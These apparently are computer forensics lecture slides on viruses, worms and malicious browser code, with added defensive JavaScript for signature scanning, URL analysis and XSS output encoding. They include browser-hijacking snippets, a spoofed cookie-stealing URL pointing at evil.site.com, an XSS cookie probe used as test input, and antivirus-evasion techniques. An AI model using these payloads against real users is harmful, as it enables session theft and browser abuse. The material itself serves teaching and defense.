Viruses, Worms, Mobile Code COEN 252 / 152: Computer Forensics
Virus: The Principle • Virus attaches itself to a host that can execute instructions contained in the virus. • When the host is invoked, the virus copies itself to other locations on the system.
Executables • Companion Infection Technique • The OS calls the virus when the user requests the companion file. • Windows: • Virus is Notepad.com, hiding behind Notepad.exe. • Sets the hidden attribute so the virus file is not seen. • Launches the true Notepad.exe from the virus. • If the user selects Start > Run and types in notepad, Windows starts the virus (Notepad.com is found before Notepad.exe).
Executables • Companion Infection Technique • Windows: • Virus renames Notepad.exe to Notepad.ex_ and hides it. • Virus takes the place of Notepad.exe. • Works with shortcuts. • Used in the Trilisa virus / worm (2002)
Executables • Companion Infection Technique • Virus uses alternate data stream feature of NTFS: • Streams look like one file in explorer and directory listings. • System activates the default stream, the virus. • Virus calls alternate stream. • Win2KStream Virus (2000)
Executables • Overwriting Techniques • Virus replaces part of an executable. • Usually the executable loses functionality. • Users will know that something is wrong. • Prepending Techniques • Virus placed in front of the executable. • After the virus executes, the host program is called. • Very easy for .com files. • Easy to clean files. • Bliss virus had a disinfect mode built into it. • Used by the NIMDA worm.
Executables • Appending Infection Technique • Virus inserts itself at the end of the host file. • Adds a jump at the beginning of the host file. • Stealth Techniques for Prepending and Appending: • Compress the host. • When the virus calls the host, the host is uncompressed into RAM. • Pad the total package (virus + compressed host) to the same size as the original host. • Choose the filler so that the checksum is not changed.
Boot Sector Modification • Target Master Boot Record or Partition Boot Sector. • Michelangelo Virus (1991). • Replaces the MBR and moves the original boot strap code elsewhere on disk. • First the virus loads itself into memory, then it passes control to the original MBR boot sector. • Places itself into the boot sector of every floppy. • Memory-resident copy of the virus is attached to low-level BIOS drivers. • Gets called when these are executed. • Can no longer spread under WinNT, Win2K, WinXP, only wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.
Boot Sector Modification • Michelangelo Virus (1991). BIOS initializes hardware and starts drivers. MBR executes and reads the partition table. PBS locates the OS start files.
Infection of Document Files • Many applications use macros: • MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, … • WinOffice runs code in subroutines such as • Document_Open() • Document_Close() • AutoExec() • …. • These subroutines are executed with every document.
Infection of Document Files • Melissa (1999): • Resides in Document_Open() • Copies itself into the Normal.dot file. • Normal.dot is processed whenever MS Office starts up. • Melissa changed the Document_Close() routine. http://www.cert.org/advisories/CA-1999-04.html
Infection of Document Files • Excel Version: • Virus infects Personal.xls • This file can contain macros and is used whenever Excel runs. • Laroux (1996) used the auto_open() subroutine to execute whenever an Excel file was opened.
Infection of Document Files • Frequent macro targets in MS Office: • AutoExec() • AutoClose() • AutoOpen() • AutoNew() • AutoExit() • FileClose() • FileOpen() • FileNew()
Other Targets • Source Code • Scripts • Visual Basic Scripts (.vbs) used by OS: • Startup.vbs • Exec.vbs • Shell scripts, Perl scripts • Java Class Files • Platform independent viruses
Propagation Techniques • Removable Storage • Boot sector viruses, executable viruses • Yamaha’s CD-R drive firmware update contained the Chernobyl virus. • Email attachments • Shared directories • Windows file sharing via Server Message Block (SMB) protocol. • Network File System shares • P2P services such as Gnutella or Morpheus
Anti-Virus Defense • Antivirus software on gateways: • User workstations • File servers • Mail servers • Application servers • Border firewalls • Handhelds.
Anti-Virus Defense • Virus signatures • Looks for small patterns indicative of a known virus. • Defeated by polymorphic viruses. • Heuristics • Looks for programs with bad behavior: • Attempts to access the boot sector • Attempts to locate all files in a directory • Attempts to write to an exe file • Attempts to delete hard drive contents • …
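Added example, not part of the lecture slides: a minimal signature scanner of the kind the slide describes, written in JavaScript (Node.js). The signature table and the sample "files" are constructed for this demonstration (real scanners draw patterns from actual samples). The last function shows why exact byte patterns are brittle: a single changed byte, which a polymorphic engine produces systematically, defeats the match, which is the reason heuristics are listed next.

```javascript
// Signature scanning demo (constructed signatures and samples, not real malware).

// Signature table: name -> byte pattern known to occur in a specific sample.
const SIGNATURES = {
  "Demo.Marker.A": Buffer.from("DEMO-SAMPLE-MARKER-A-2004", "latin1"),
  "Demo.Marker.B": Buffer.from("DEMO-SAMPLE-MARKER-B-2004", "latin1"),
};

// Scan one buffer against every signature; returns the sorted list of hits.
function scanBuffer(buf, signatures = SIGNATURES) {
  const hits = [];
  for (const [name, pattern] of Object.entries(signatures)) {
    if (buf.indexOf(pattern) !== -1) hits.push(name);
  }
  return hits.sort();
}

// Flip one byte of a buffer copy: models the smallest possible polymorphic change.
function mutateOneByte(buf, offset) {
  const copy = Buffer.from(buf);
  copy[offset] = copy[offset] ^ 0x20; // toggles case of an ASCII letter
  return copy;
}

// Constructed samples: a clean file, an "infected" file, a mutated variant.
const cleanSample = Buffer.from("Just an ordinary text document.\n", "latin1");
const infectedSample = Buffer.concat([
  Buffer.from("header\n", "latin1"),           // 7 bytes of harmless prefix
  SIGNATURES["Demo.Marker.A"],
  Buffer.from("\n", "latin1"),
]);
// Offset 7 is the 'D' of the marker; toggling its case breaks the exact match.
const mutatedSample = mutateOneByte(infectedSample, 7);

function demo() {
  return {
    clean: scanBuffer(cleanSample),       // []
    infected: scanBuffer(infectedSample), // ["Demo.Marker.A"]
    mutated: scanBuffer(mutatedSample),   // [] : one-byte change evades the signature
  };
}

console.log(demo());
```

Production scanners match many thousands of patterns at once (for example with Aho-Corasick automata) and unpack or emulate the file first; the principle of "known bytes in, name out" is the same.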
Anti-Virus Defense • Integrity Verification • Generate database of hashes of important files. • Recalculate these hashes and compare them to known values. • Configuration Hardening • Least privilege • Minimize active components. • Set warnings (e.g. against macros) • User education
Anti-Anti-Virus Defense • Stealthing • Hide virus files. • Intercept scanning of infected files. • Slow rate of infection. • … • Polymorphism and Metamorphism • Change the order of instructions in the virus code. • Use equivalent code (e.g. increment = subtract -1). • Encrypt most of the virus body. • Slightly change the functionality of the virus as it spreads.
Anti-Anti-Virus Defense • Antivirus software deactivation • Kill processes known to be antivirus processes. • Disable internet access to antivirus vendor’s pages. • Change security settings (e.g. allow Word macros to run)
Worms Worms: • Propagates across a network • Typically, does not require user action for propagation. Virus: • Infects files. • Typically requires user interaction.
Worms Worm Components • Warhead • Propagation Engine • Target Selection Algorithm • Scanning Engine • Payload
Worm Warhead • A piece of code that exploits a vulnerability on the target system • Exploits such as Buffer Overflow Exploits • File Sharing Attacks • E-mail • Common Misconfigurations
Worm Propagation Engine • After gaining access, the worm must transfer itself to the target machine. • Some worms are completely contained in the warhead. • File Transfer Mechanisms • FTP • TFTP • HTTP • SMB (MS Server Message Block) • Windows file sharing • Unix servers running SAMBA
Worm Target Selection Algorithm • Once the worm has gained control of a target, it starts looking for new targets. • E-mail addresses • Host lists • Trusted Systems • Network Neighborhood • DNS queries • Randomly selected IP addresses.
Worm Scanning Engine • Once targets are identified, the worm scans for the original vulnerability.
Worm Payload • Some specific action done on behalf of the attacker. • Opening up a backdoor. • Planting a distributed denial of service attack. • Performing complex calculations: • password cracking • math research (actually happened)
Worm Spread • Worm spread is limited by: • Diversity of machines • Tiny worm • targeted only machines running security software from a medium-sized company • was successful in infecting most of those machines. • Worms can contain support for multiple entry methods. • Too many victims crash. • Fast worms can cause network congestion.
Worm Trends • Multiplatform worms • Multiexploit worms • Zero-day exploit worms • No chance to patch • Fast-spreading worms: Warhol / Flash • pre-scan targets • Polymorphic worms • Change appearance • Metamorphic worms • Change functionality
Worm Defenses • Ethical (?) Worms • Antivirus tools • Fast patching services • Firewalling • Block arbitrary outbound connections • Prevents spreading • Establishment of Incident Response Capabilities
Malicious Mobile Code • Mobile Code • Light-weight code that is downloaded from a remote system and executed locally with little or no user intervention. • Examples: • Java Applets • JavaScript • Visual Basic Scripts • ActiveX controls
Malicious Mobile Code • Goals of malicious code: • Monitoring of browser activities. • Obtaining access to the file system. • Infection with a Trojan horse. • Hijacking the web browser. • …
Malicious Mobile Code • Target Applications • Web-browsers (most important target) • E-mail readers • Either directly or because they use the installed browser to read html messages. • XML-based protocols • Web Service Architecture
Malicious Mobile Code • Browser scripts: • Use scripting languages such as JavaScript, JScript, VBScript, …
Malicious Mobile Code • Attack code • Can exhaust resources. • By creating an infinite series of dialog boxes. • By creating a form and filling in an infinite number of characters. • Hijack the browser.
Malicious Mobile Code • Browser Hijacking • Use the onunload() handler: • <body onunload="window.open('trap.html')"> • Can be enhanced by resizing the window to fill the screen: • self.moveTo(0,0); • self.resizeTo(screen.availWidth,screen.availHeight); • Can be enhanced with popup windows. • Add bookmarks: • window.external.addFavorite('http://www.cse.scu','Info');
Malicious Mobile Code • Stealing cookies via browser vulnerabilities • Browser automatically supplies cookies associated with the domain of that website.
Malicious Mobile Code • IE 5.01 vulnerability: • Create a server-side program capable of reading cookies. • Compose a URL that fools the browser into thinking that the site visited belongs to a different domain: http://evil.site.com%2fget_cookies.html%3f.boa.com is translated into http://evil.site.com/get_cookies.html?.boa.com • IE 5.01 would think that the top URL belongs to the boa domain and provide its cookies.
Malicious Mobile Code • Capturing cookies • With tricky URLs (see above) • The URL can be hidden in a JavaScript command or in a hidden region of the HTML code.
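Added example, not part of the lecture slides: the defender's view of the "tricky URL" from the two slides above, in JavaScript (Node.js). A correct URL parser delimits the authority (host) at the first raw `/`, `?` or `#` and must not percent-decode before doing so; the IE 5.01 flaw was decoding first. The function below reads the host the correct way and flags any authority that carries encoded delimiters or userinfo, which is the check a proxy log reviewer or URL filter would apply. The function name and the second sample URL are this example's own.

```javascript
// Analyse a URL as a correct parser would, and flag authorities that try to
// disguise the real host (constructed example; analyseUrl is an assumed name).
function analyseUrl(raw) {
  // scheme://authority  -- authority stops at the first raw "/", "?" or "#"
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/?#]*)/i.exec(raw);
  if (!m) return { valid: false, reason: "no scheme://authority" };
  const authority = m[2];

  // userinfo@host:port -- the host is whatever follows the LAST "@"
  const hostPort = authority.slice(authority.lastIndexOf("@") + 1);
  const host = hostPort.replace(/:\d*$/, "").toLowerCase();

  // Encoded "/", "?", "@" or "#" inside the authority only ever serve to
  // confuse a parser that decodes too early; a real hostname never needs them.
  const encodedDelimiter = /%(2f|3f|40|23)/i.test(authority);
  const flagged = encodedDelimiter || authority.includes("@");

  let decodedAuthority;
  try {
    decodedAuthority = decodeURIComponent(authority);
  } catch (e) {
    decodedAuthority = null; // malformed percent-encoding
  }

  return {
    valid: true,
    host,                 // what a correct parser treats as the hostname
    decodedAuthority,     // what a decode-first parser would have seen
    flagged,
    reason: flagged ? "authority contains encoded delimiter or userinfo" : "ok",
  };
}

// Constructed samples: the slide's URL and a benign login URL.
const SAMPLES = [
  "http://evil.site.com%2fget_cookies.html%3f.boa.com",
  "http://www.boa.com/login",
];

function demo() {
  return SAMPLES.map((u) => ({ url: u, ...analyseUrl(u) }));
}

console.log(JSON.stringify(demo(), null, 2));
```

For the slide's URL the correctly parsed host is the whole string `evil.site.com%2fget_cookies.html%3f.boa.com` (not a valid hostname at all, and certainly not `boa.com`), while the decoded view shows the path and query that a decode-first parser would have silently attached to the wrong domain.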
Malicious Mobile Code • Mozilla had a vulnerability that executed javascript in the URL.
Malicious Mobile Code • Browsers allow Javascript in URL if preceded by javascript:
Malicious Mobile Code • Browsers allow JavaScript in a URL if preceded by javascript: • Change the JavaScript in the URL to retrieve cookies.
Malicious Mobile Code • XSS (cross-site scripting) attack • Attacker injects malicious code into a website. • Browsers of visitors to this website will execute the code.
Malicious Mobile Code • XSS (cross-site scripting) attack • Vulnerable search engine does not strip out the JavaScript: • Search engine sends the script back to the victim's browser. • Victim's browser executes the JavaScript. • Browser pops up an alert with the cookie values. • Attacker needs to trick the victim into using this URL.
Malicious Mobile Code • XSS (cross-site scripting) attack • Assume the victim has interactions with a vulnerable website. • Attacker crafts a link, sends it to the victim (e.g. via email) and tricks the victim into clicking on the link. • Victim's browser uses the attacker-provided URL to go to the vulnerable web server. • Web server "reflects" the JavaScript back to the victim's browser. • Victim's browser executes the JavaScript (because it trusts the vulnerable web server). • The JavaScript payload might be the transmission of cookies. • Cookies can then be used to hijack a session, …
Malicious Mobile Code • XSS (cross-site scripting) attack • Malicious script can also be embedded in HTML documents.
Malicious Mobile Code • Script sends an invisible request to evil.scu.edu containing the cookies. • Attacker's CGI script on the evil site processes the cookies. • Stolen cookies can be used to clone connections.
Malicious Mobile Code • Defenses on Server Side • Input filtering • Remember, all input is (potentially) evil. • This is very hard, since scripts can be hidden very well. • Output filtering • The attack script needs to be reflected to the victim, so encoding everything on output works.
Malicious Mobile Code • Defenses on Client (= Browser) side • Never surf the internet with administrator privileges. • Disable scripts. • Internet Explorer introduced security zones.
Malicious Mobile Code • ActiveX Controls • Part of the Component Object Model (COM) • Have the same powers as a normal program • Microsoft Agent allows inclusion of animated and interactive cartoon characters in web pages. • Are executed with the same permission set as the browser. • E.g. administrator privileges.
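Added example, not part of the lecture slides: the server-side output filtering defense applied to the reflected search-term case from the XSS slides, in JavaScript (Node.js). The page template, the hostile search term and the helper names (`escapeHtml`, `renderSearchPageSafe` and the rest) are constructed for this demonstration. The vulnerable and hardened renderers sit side by side, with a crude tag counter that a test harness can use to tell them apart.

```javascript
// Output encoding: the reflected value is made inert before it reaches the browser.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode the five characters that can break out of HTML text or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable rendering: the search term is copied verbatim into the page
// (this is the "search engine sends the script back" case from the slides).
function renderSearchPageUnsafe(term) {
  return `<p>Results for: ${term}</p>\n<input name="q" value="${term}">`;
}

// Hardened rendering: every reflected value is encoded for its context.
function renderSearchPageSafe(term) {
  const safe = escapeHtml(term);
  return `<p>Results for: ${safe}</p>\n<input name="q" value="${safe}">`;
}

// Crude harness check: any tag beyond the three the template itself contains
// (<p>, </p>, <input>) must have come from the reflected input.
function containsInjectedMarkup(html) {
  const TEMPLATE_TAG_COUNT = 3;
  const tags = html.match(/<\/?[a-z]+/gi) || [];
  return tags.length > TEMPLATE_TAG_COUNT;
}

// Constructed input: an attribute breakout followed by a script tag, the
// classic reflected-XSS probe that pops up the cookie value.
const HOSTILE_TERM = '"><script>alert(document.cookie)</script>';

function demo() {
  return {
    unsafeInjected: containsInjectedMarkup(renderSearchPageUnsafe(HOSTILE_TERM)), // true
    safeInjected: containsInjectedMarkup(renderSearchPageSafe(HOSTILE_TERM)),     // false
    escaped: escapeHtml(HOSTILE_TERM),
  };
}

console.log(demo());
```

Encoding on output is reliable because it does not need to recognise every way a script can be disguised on input; it only needs to know the output context (HTML text, attribute, URL, JavaScript) and encode for that context every time.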